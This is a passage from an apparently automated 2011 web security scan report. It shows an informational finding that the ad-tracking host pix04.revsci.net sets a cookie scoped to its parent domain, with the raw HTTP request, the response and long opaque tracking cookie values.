Up0wTe4IljiVW9v9i0OJNk/9rufkbNejrhdMiSolHtUkaU9woFboI0gpEvgcSpvC6rRKSKvIVBxkKu6aTDQ3qvM9EyE1U4Up1zpIGHMftOgG74XPCd95sScSFvuK8duCYKnT000jVh9ooojowJpFoXZoqWOaZCpp1PBATAS6s59h1xaqvlGGaQufIEiW55ytgO/T1incBQ3ecpBIxMZdi0cAKzBDgKCyPxknZaaBnqoVHxjdk4GEQ9+dSjiFw4sFvkyrdgfzJyg5Cne6b7E6K9jbR2ShKCSz/z1iYgGkSf1mqGP2lYOknp9o3/ZIQ1pdcs+HKCapC8qO3tZVW2M7OBb0u1PAHPEGf+yyxkPuyrQgQ34G1Ue4G5uEAkslyh+qdighV5QpToqFJyc/3AdN6hvwFM3sM9S8kIH14MKuy0glR3WC7HNe92EpXQjDe7iS8W9AFNGwY+Su4SnW2JHCOjVeCwbXxPvMuVavDBAmKJh0f+sZvdXpMiD5ZTkGXqT1UPrX6yL4OXgJpnTkKwTxrcZqvSsarY5cDpvmaV+6Zj8OlMHCWJkhGpz/2aUDAqL7k/WFuOQq8UB70meEsDHwNFkXClqdFB2QjBC6zhg+Xfnw1RBV1z1dw+NxNxssSWTXYT2ftcXZ4aSkaO0bHNIV8ZlpGaZT734oOPjDIM5PRQ804RhNhFjsQzT7PaEm+F7rMQLCkOivvHsevPQLn9c8EsDN4AAZA2rPybhkASUk7KcA/7L69tZ970J/PfiTlPYMEBu3IZXHQS67TtsGkS1FcrJJQMON1F2xmxMttsEBFdmZa1qN6F7Jvk1dq5DQwWbqSYxVojZD4yqwR4UgXk0W+f/sWrYg6URPBpBM1L1NlF7NNEmd6XUkEa285x1gld6SQXL6pUaIZqSG8aeOCMe73GVxTY3cilD2Wn3wBRiL1jEHLwn3GwfFPIcatu3tJHPngQ4cjM+BSsmRvBPMktdaWA9nf3Z5lIOIzEUF4n/hDTCZvPRGeRJmRUg52vPzBdJ5BplGWhReHr2k3cHWeh9vfrO+YzbYBaEaM5dA==; rsiPus_qHFS="MLsXtSMNJjhvJZE469KkOkhRwa7hUMAPxrf6hJozRd8Z+A+35M/kolpihGJj4lnhK7jeS1EvCK92NbndG2piitFk5yhzPh1lhzAHDDDadDEwiYGhrf99bXY2VOe9PIcfFRS2/TJRrsBbxPCqZATA815Vb6OrwpvJR+zQ8bOO2/nv1reFvTAQyZDlS7vGNNnVJPK/y4pkJrTpyha4qz+wVZ+0nKQ1PrbuatTG+1XIuntKVBy+KSa5GjJ0+NiSRkiY2gTwsh9Wo49VbeYeG33svkQyKx2nBHu1UNHvM1NOMBCclsB5LPMEfUKHMA7zYcuiJVSHopUraI4PdCYd0j7nw77TF6Myj458OvvChiwbXc//IBullX4PPJTkOIdpWG1WGRkZ5R+pr+XTXBP7IFyyJX9UGdjswfbZQ/cKB8tEthnIvsUN3l1/GpGyciYuzQRx9Al3e90QROIks27kL9dnZGwAjBJtXVpe6MFNdOvQpn+tz09O4mJZPHuowe6DCuo1B8oszSI5fVSKkXNoqvI+ErmMEv1+U9VX8J5biwixpTa7gA9LQbn7krejCD8QHP7t1kFgGl4zgYDfhaxwE5K+nM638a3lS26i8esXynV4uJv29uBZyXSeP2Cb1VOSLGDty11xAdZBUh+CkpnBoWyFJBWEzjAa8WkcLKasgH6iAzJkFL0+HJwZQoPFyiCLXUiYpXhm/x10WL/r9uhm7zzpYv8hdknAVy3VzJygvAvwws+exYdwg1ML2wVcHJPJoCf8wPMcHMY7i4f1anYIpa13Um2RBlrBaL3OQD67wkA+G9zxlynCLkSYGwNdQBcfjQOrTj7yV5gPRFPB2hvrg9LkLzMuA7EulSTXkioqFYbi0XAvyTP7xQhU/9W/jAvJ5oQ9a+JFHjOKal4wyQKB6xwBwWbA1+jW9PpYwHsmtJ3ZnoK3XCydnoWQrN9dp3FcoFSFDVd5va4dSMaw7uS2qZld3DWlV5tpeUV2W3Qr12oXahUrt8/ekOJB31oKbMjTQ/2PEkLayreVErLEHTF9K/QBdRKh/Q3k5sgIIDBwFfIfEubP8z1F0X4KjeqlHHVhVC08/HcAzh3lp+L87xwXv12L3Gc7GZrw5pqQEQ8gF5dFLxgJByT4wiNK+3RBJ0+8Zno7Mj70ShXCPoDYJO9viSdA4vbhGDYrVnqNxu2qWcDS+zi2lqaBllNRK+brZPnynugQRPvjyE+Y60xVdWQIGp/c3DrzLKU245EtADE/BeE09F7uQnmFRG8pn7GEPC0Kz0iScIFrGzck09k8csnKw5pwYQVnO9a3xLuMRgjgYMV7Hl//0nkP82nOF3w8i/F1P00S+yk9nFVCLxzuKNfXg6dwlfnf8g=="; rsi_us_1000000="pUMN4y+nMBYULQEQO7/+agzaymK59vZiJkFr2VpXgkC+Jr7XRa3zgxZCz2jywJqL21DklO4Fpq7W4mts2r1Oy1FhyPzXR27K76ayyBnmVEkLYK9dqm/WVHtOQfXO7stZRMQ4v1NQ+BhisfeIu7o57J/NL+ML4rFz0zPssRqmG3vLe9X4zcDFpnjiWFRNyv+G3MwuzU62+ajHzmOBzh7PtBgmFS5SIFhKeIIKbCMUz4wlPMNSymbJ6a2XKOG+2ei45Ad4YYboEI7WG8ZOPzoCXWZ1lO+ZHBl6X+WYJI5AxjXqR2mV+XImHoSMTtfLK1kM7jouazlFjZ0Ev5vsukEMicI+4X6y4m/3cMVgIcMjpSLVhVO2pEkNKGtwh466rXgs95P0T0WN6/s1KgvwFnqXctRIQ/Oq/BUQYRY+DXEIkV7aaPiOviEbg2eRMO4tQnV2eSDALdxkaOt6lWCEZ6ULYY9HzNvJ20ilDlN5jFDENKxVLl4u/B5BkRHil8ZfBLkAKoN//aUTRoxpf2yXvLVrJ7F/+imFqugGVtxr32rZ0hQUUmtRmsY2QWKwUq5nVrl20uJO3GCfKzQ18l3zZ5L2NXSJbxITog7107PbyssVEEdHG0hcMYoDyjC4PjbzKjLcW18mXL08XwiHE4YfrQw8lxc5wChTMWjvGvumGXTSl9P6CzP7pe3R+M8FeiZUVxQR9dAK9utm238M7BEjTv0WLCWAGVmZL0i4riBxZOk56P0KfzJC8p0SL7wXK0hPFFCpMkW9jN5fsGG/5Ol4PmRHB9T+Cr44mvQOMzjCEGjNtdNRSawuoNk/ICygEO3/ww5hKsu1TeIWENf75CeAslAJsPHhym99XmQgpuj/3M3sgmZB7BsEl4Ieenb58+YNXKanzGzcfNQweb6ZNtZ7Yhj3b14x7MxWJXAcwdzhiNk+vgIe9jvBjFiOhohn4BPxoz8BGOa7Br+rx+U5dq94tU0sEfN2UWtc4MDjSWKcpARVKBuL6rtiNxbghQp9N1x2lk1209cPfPKLOfg0tZADHGz2YJx/5CzLDj2OHUNBr0AkQkKt02L9C3aKqd9G4C81DCeHwazXesXLG5hlUOr5qacPemO+yXZxmKhacQr/FhJAk9h/LuE/v8oHdPDGRw9EL0klja3m/5k93bXJ+I+ldopJwPL/ozHpClrKOP1jn0j6xCOveVxoEtQ9SPUJ/bC3xwEljBRXDOzZjQssBcrQZGrae8EFSLT6ly4v4dp0DBh8UiRHbVjbC2SPSVk8ARb1zu/pliJmGVFN661g8J+ggiAn+K8V1mVKNJ3FhirFdqcr1dzMSIghzU3lz7gEi3DZ4+qYEeAmaTHVAbQN06H7O/YY6azhKX7h9Kdie4fvz1XdpOHx+YaehMbksNjjc1eC74wuC1pXlGSAiE9E/B5F5tK+StSu9EqgSOEfg7wnHsS5lN7ANxVfkD54qye6zUVRR4m7N+geNSaYBcRwcQjWRNFuXj5b7vE1T22YU//VcIqOa66BHKpTS/VWw642B5fp8A/PNszRPZOWVgACZu7mJlxab8X4BzlxP6NK49ax/b62tvVkK1IuKekaBdS/oiSxQxixYX7IP+DK/oYJ12BNMW7ybBSJYA/TJMFCSWks+Fh5eByLlGIWBqVGRu10yvSs9zcvappyhjSyN6smIOSnSR1k5mCT9mlaWFcCNTgHxqfw59HAnX4oatv4h+41XORJpRcgEqEfPfTfss+S0BN155VVHslgrPd+QHLEMumzCupDguXJlwzZDEtZzHgbgo1e4hRP40I="; rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uzs22rMriQJ4Ym1N1EuC/pV+zq2jLxL9z1pFHcD2oMpIyt/lxMhiEmSOkHFIHZeBImHWKCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa0AbFjW9PtKIFHNv4PL1RUaJzrH2RPUn836DjPQ4L4Uubj0NaY9wI2qjpCay/9h6Y4N/vrTyarBrZy/5p1vkVo6HLAj5TEabu+hT6vuj41246c95NOaRAsl5hE/RAIN0jCKWeIrwU7hjL6yZdj93XkHnxuY5dXdsfw5hXREUlMqNPwkFtFYTAJwanBh5yYsGo3OuU23g4Sg+m/4oPiiW7+wP+sVJlWRijizVDRqGD+7XWyoETDu18Mfh38sGaLcBo3I8QKLVIHNbs/aPybUAp6deZ4PBam+j59FVp3j+OlK6mRTtV96HqNd0fyLSobj39hOpsGmZ9PBCS6PKnceOCU88KZYLjs9D/ogMjd3GXexqu6MMY+wrZ69abotqDqceVMfHYfc+u2rmmXQ4kjNvvzLnMiPUxpeWc6y6IrrLSU0aP1/RHBvaBGvVfQk5WA2CVlofLvT7Y9pNS4wEX/g0OMG57+/q0VMPqW9uJ3RN9aKoReMYds9lT5peBWYf0miftYMn2x+OcCfbclm2XaYCSvUccMQxOhcf09

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnY4hOkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrUXETRdDjDrhFtW8Q3YBu7LH0BpOZEkQ7qgbtIpSGhnXHaGeIdDCL4J/EIpOfB2LpopMTQBonSYtNsSOFv3mTmNF6kgYFHWqkKotp3Ph6zGsbpHmcoVxKLDjaQ1ChU6atbm5fFWrFFMTh5ZihsyERjUDjxTeKWeKeRY0gNIwIlZkQZOLlk8uZfxFeqiNuC1rBBItAl4Lntw6epFlDHMO4w/LnMOPcO16hfaP1c2HXavcINK+Ha6jdzz882yisW4ZNXZ0/EfYV6qz6m/ZYwwogtLmNexg3zwQvHA7cimsoGkc/zKBFmhTLYOk3JVzYm/8hG9pSKUUhwaiKvYsTVArhovtcyX8hYUhv01pHi7zlqUdxGLqcaO1H6VCi8cDciF/ZP4ms7zKN2uHCi5MyRzA038Wznt+lmcN1ePCUy4Znt1LIBdpwYVX8Ixvp6/6oo3uaQyuE+Oc5jUUhPy8bwGC775SChwg8S5OmUN8MQxPOaP02; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:00:32 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 15:00:32 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.187. http://pix04.revsci.net/I10985/b3/0/3/1008211/747675233.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/747675233.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7U1qHNUdlHLPM5AqF7BNa0pYflQcV79fjL0tuNsq1PBC4dQFP7CuHjAC6pOp24XOz79cZhArDSL9bvUudrTRvEIroA4NCzad0MsU2sXKSNtkRN4Gq5YX61eq3sz4DxD58sbq+VGlvjNo1C2NsLJvYHpIaxKEcAVCfYNFuiJW9Ld6LCksMDycjv5iOP60aUROV32LGj6skxKEfVMjClll66J4IEP/xpmdrbkw2u1kTEZnZn+uDtlgoahVnyL84qaC73ti4HPMP6DDXwgyzvy3zXjb9F8x4cUAH+mu25iz/7xFtrTMDRXohiE7z0OhT3yWVMDmAvayqLMJWypL5ig0W+H0hIkdRrpoDA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:42:57 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/747675233.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_OE4x="MLsXtSMNJyhvJZH0ecXcxPALrEtuUCF+UoWp6s1T5naB64mAw0+Om2ozfWioJheIF3Jk6SbsCfwKDgu/quNldUdsXg/E8So0ZUTR0TVcemT1DUjfn+dZbXY2VOe9PIcfFRS2PqRUqSEB0TCrYF8Mwl5Ft4iss5u2Pcc24RAK1dQ5BwDPyfhRsJ7Y1dO/RqTb8bdvz02aoCjEhk5x0dOdsHsfyhsRubj8NiwOuS85LCZILFLXHC33tY3mJJR+SSxu0Qc4H8uo48mXMq/YmSKlgPeNuWHGel7s2CvIFnCSglJytVrAvije449jzFSq79C4EU13BgUNa+AToxomcn9/qM+UI7TFjwbiMfDfJMt5mA4fdOeHnJF9VRWdWibvDBdfhI2hA22JBU9U7O6jW2208j7syfcDNCYhN9tFhJLxc21p78xDyLbMLO1BCJftNHSHGmcVBQNr+klRtNVhI+uAnzZ3LEmqHWB2OXsOqfHWBqL3yRG9/89iY73Nzgq+o/Bpo+cHDWPFK/RsHIi3DSrtr4cAuJ95pWGoNfUkFIcWX4QtHQy2SFQR93zVsvELKFta8J725XgRB4SeKT4JcQrwrNXu7zfSNy/bRmgvXKMRe1hMqnRjX60HPs0QHeDkvFgNHNGyP0/IB6QX8KB0gSAp/7zsvRtUEkie0RO0vthueroAy3GDmOEStdEzzTL7xnYMMYmNF3vjvYORgHPyn39al3lTSAzKhzXV5fVoNguWtuod6BpsEl3due/nM/g47f2vmcT3+eJizDxnaloDCuV3ssq6iWG7yHcbtYkVhCSDmrKjulzeHYCb9RGbnnpHEbwVNkmJDZaTi797BsUlOEIGtdRBnqS1bToYjuAKIug5FApia87UtHyk6UXmRAy5u0Drxwmuw0vD9o4yCGJDpDaxNrajTEbfVhJ8yCJ/iGQsHATY30VKrTJXUJvfiCg4VdwiD2psS2TWou53sRPGQJVe+7k0LqnWVcpFVzXAcgbGMGTScFEpelxie6i5FRA4KJKfnf1bo4QUT/b/j/T8z9kKYKTmTWQQ8GwLwMfRXnwATsC9JcGmvHKrnfEl+1auNzhzzYW5a/w6tZZOZCCHrXwe7tyXjiFc2k8NkGn5tv95wxRhditU9JdZfeI59PSU0RsCFwMF6ygq2pxp0Pjn/CczeuVsNUY/+jgMNMCr0aTh+dTQ3ZjyhANDWnN2WnLyBqr5Uebvce0HKzqUUWuoW3rqBIpb/7Ve7TLA4OiSSuztNry/DON81bW6BbxMUp2j97yURZtplUM+qLJrwD8BIzqmJkPGk1Ql8rEE06243WD/koW32N83czt0dwb8q0Up+m9lTgY4sBh5IRJ5HTd+ng6gqS+7EcQ6"; rsi_us_1000000="pUMN4y+jOBYULQE0ur/TotBv0OXJiczDnb++8r/RJ/0QxWQt7qn94EC+Qxu7A2AHtZzJRHgcWvhF/5C6yfXpdz2AhPlooLcwEDbNwHpJvZYxRBwAtjfuDg6vSfCZrLYXyVWx45tAtnJtsFCuibSu4CZXtB76b3f8tEGPF69bqFF4KqZaW2/J8yyMX1qU7w0p90ENxbDGMeuvf1ur8St6M12vZuoEDT2lQEwxZ8JblEJRfWt1tp4+PgkZpQrPMNaQ8yTg5c/6q1wABd1ruRFlvz8RSceX4AtL7izbrfjTBEAIoS7AAF0lr9p/3t0ZAddAb7VXBJDm2e/L8pu65s16BoMyCy39MxKe7ZQMunD4ScbWkMHCnSt22sXeOfyu1LscVj1pdOGLG6U5jYjoXHFyLN+WJ/DJcI54GAcRBW/rJ1Vn9uPtnOZt9cmVH4Izf0oIg0BQLRKaRWr6E46G9yFSfx0+hz40KiZFkke8MXZ0yGJADUOqBWeG+ORqgyYFoXx7Q1SuqDIjyXoflYnZXLusG8CNkjag9tInkCJOg5/2Vic+WExdqTVEd2PKn7KZTv6WvHGMa1Ur1v9k4dm8THWe2PfNL9ymcsDEVMRiTOtzeTIkZ7j81GpQbwy0XgYT9aO74fdap2sLPRWO6sZ+lGFHnJ/7I5uFuEO89QtiDhPPLAy1W2zVlZwyZlOGQOItZm0LBp4lnynrBSvlXlOcIhSo5Lvyxm8G6/iusxlmlEpzURMx79qesSS8/UEtPppSKzNwoy2CKZbuiiDg+Dxymr1uzXCM1dUeGaKgfUOGfcGolO9ZWZTFlQ6wwPRl5om9Q3DGw4QXckxHBLdUVn5emNC0ejfBl0V9ZoGqxZ08zy/U1jk7hoHPbvgClX9BMjwNgb5J0GLEz9W4er7JHB6mwUeQMPnQJY/C3rbBFa1gixX7tGJFFjvBiFiOhohn4BM5D7aae5u1/EMfpg0hXokyXDPD2TRTiKTxk7AzoiArowSbiQCb9bv+w1hBkhbmPYJzqDF0yajApo/OaBjsqtA34/MziVNXr/Wlq6oZ99haiEAF7s1pgmT5E89CXg8KF6G3j2LSNl2NX0ImOw97FGoJqhZXuai/JJIt7uzE3VbdYpYoA9pTHbqY4/uvTo/6ewAUwcCMhq1FfujoTS9m6tqwCvzlaHIho70DkIAAVSpTiR0c2vj8APDXXA99/ujk6aziiwZLZysJTPl2xRBucNnav0XDyeageBwYUL6qHovgS82M+iO4Wjk5NEb7HrXTi8+TnISSwrWuzDXfKGl9BM1pwEzaUgb0wIQxFcCtW+R5fJsr1ZzZlKy8LYnNsA8nAxwTsNtuK9sYrC80PfnsQnZmGWFqpd8n2S4olYNfqY5yjZMUBV7pwfMSjhnM8Ceu5T/fASb8cxoV